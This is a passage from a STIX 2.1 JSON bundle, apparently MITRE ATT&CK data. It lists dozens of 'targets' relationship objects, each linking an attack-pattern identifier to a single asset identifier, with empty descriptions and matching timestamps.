"identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4f5db691-33a2-4357-a616-60581d64af16", "created": "2024-07-01T10:37:15.820011", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820013", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0c98e2a5-0831-45e0-998d-1fce1306f52c", "created": "2024-07-01T10:37:15.820021", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820023", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b77cf5f3-6060-475d-bd60-40ccbf28fdc2", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--10cdc4bc-0311-41bb-bc8b-c37983220326", "created": "2024-07-01T10:37:15.820031", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820034", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ade1c1cf-fd4d-4ab0-9448-1004ac6b6ea9", "created": "2024-07-01T10:37:15.820042", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820044", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5478d647-8f25-4c67-83db-5af10b539383", "created": "2024-07-01T10:37:15.820052", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820054", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e2877efa-3a7a-44cf-abce-41794516be5b", "created": "2024-07-01T10:37:15.820062", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820064", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8aa2bca0-bbae-4fb1-a7c7-1299e9e4e910", "created": "2024-07-01T10:37:15.820072", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820074", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--553c011d-7135-44f8-9bc2-48ef7a3a83e5", "created": "2024-07-01T10:37:15.820082", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820085", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b110db98-f699-4e41-b8fc-9795a8fd1738", "created": "2024-07-01T10:37:15.820092", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820095", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--46364534-28ec-404c-a520-0d2f97bf35ae", "created": "2024-07-01T10:37:15.820103", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820105", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--37f0e628-feb3-4107-89b3-38f47f42e029", "created": "2024-07-01T10:37:15.820113", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820115", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5f8d10aa-7127-4a50-918b-149b80c0d2bc", "created": "2024-07-01T10:37:15.820123", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820125", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--357e553b-24a1-4881-9498-02cea714299b", "created": "2024-07-01T10:37:15.820133", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820135", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--13410d20-b9eb-4d54-9e02-5a3e6352d595", "created": "2024-07-01T10:37:15.820143", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820145", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--73926940-cb7c-4c4e-976a-ccd115bc345d", "created": "2024-07-01T10:37:15.820153", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820155", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5898d661-85d5-4543-909e-0a59b5f2a9d2", "created": "2024-07-01T10:37:15.820163", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820165", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0baaf02e-a5d4-4fc5-b0b2-205416301802", "created": "2024-07-01T10:37:15.820174", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820176", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bef8aaee-961d-4359-a308-4c2182bcedff", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--13abc1d7-9f5b-4a57-b525-d12b901d8cf6", "created": "2024-07-01T10:37:15.820184", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820186", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf147104-abf9-4221-95d1-e81585859441", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cf42a545-74bc-4ab1-8cee-01ac61f3ef56", "created": "2024-07-01T10:37:15.820194", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820196", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a0f0dabc-1e75-4d2f-ac30-25dc401d6471", "created": "2024-07-01T10:37:15.820204", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820206", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2abddd08-2b4a-4221-9987-a8fa1e7fcf1f", "created": "2024-07-01T10:37:15.820214", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820216", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7613f097-4f7b-478d-8708-ce289fb56c60", "created": "2024-07-01T10:37:15.820224", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820226", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f3a01385-1d00-4680-8587-b8f0bd8b27a8", "created": "2024-07-01T10:37:15.820233", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820236", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--034519ff-2731-4b32-9086-06cf9f68e24f", "created": "2024-07-01T10:37:15.820244", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820246", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1db70290-6d28-49ff-9735-0b422571d866", "created": "2024-07-01T10:37:15.820254", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820256", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a71b6cfb-fc33-4cb5-9e32-d5d5bcc7b49d", "created": "2024-07-01T10:37:15.820264", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820266", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1da8c2e0-5d27-4b9a-a7ab-070df85088ca", "created": "2024-07-01T10:37:15.820274", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820276", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--948a94e7-35cc-498e-be03-6b0ac0c6951e", "created": "2024-07-01T10:37:15.820284", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820286", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3df90937-4be5-4947-b0a6-fb6dbb778c07", "created": "2024-07-01T10:37:15.820294", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820296", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8fc40bc7-a3c2-4d26-a530-b95097251939", "created": "2024-07-01T10:37:15.820304", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820306", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9f618a04-adc1-4f89-9c9e-6d536cc34d79", "created": "2024-07-01T10:37:15.820314", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820316", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eb11594a-0217-4d57-91b9-b4731c41fd7e", "created": "2024-07-01T10:37:15.820324", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820326", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cc8a461a-14a4-44cc-9fd4-69c52cc5b5f8", "created": "2024-07-01T10:37:15.820334", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820337", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b203a79a-af0b-430a-afed-9dc9c187e6fc", "created": "2024-07-01T10:37:15.820345", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820347", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e9426a91-418e-45c0-a886-923f227d935b", "created": "2024-07-01T10:37:15.820355", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820357", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6630dd16-09a7-423e-9fe7-614ab8f864da", "created": "2024-07-01T10:37:15.820365", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820367", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6e5140f9-9204-4b4d-bd50-16daf691d4a9", "created": "2024-07-01T10:37:15.820375", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820377", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0aaa1844-8680-4cde-bd60-ee85af5e0955", "created": "2024-07-01T10:37:15.820385", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820388", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c92e3d68-2349-49e4-a341-7edca2deff96", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c67f3681-7bc6-4c22-8417-e6ffc2c825c2", "created": "2024-07-01T10:37:15.820396", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820398", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c9e0c59e-162e-40a4-b8b1-78fab4329ada", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4195ab6a-62da-4419-8d95-2fb45b7594b8", "created": "2024-07-01T10:37:15.820406", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820408", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--783955de-bc43-45fa-96ae-300d7aea019b", "created": "2024-07-01T10:37:15.820416", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.820418", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", "x_mitre_modified_by_ref": 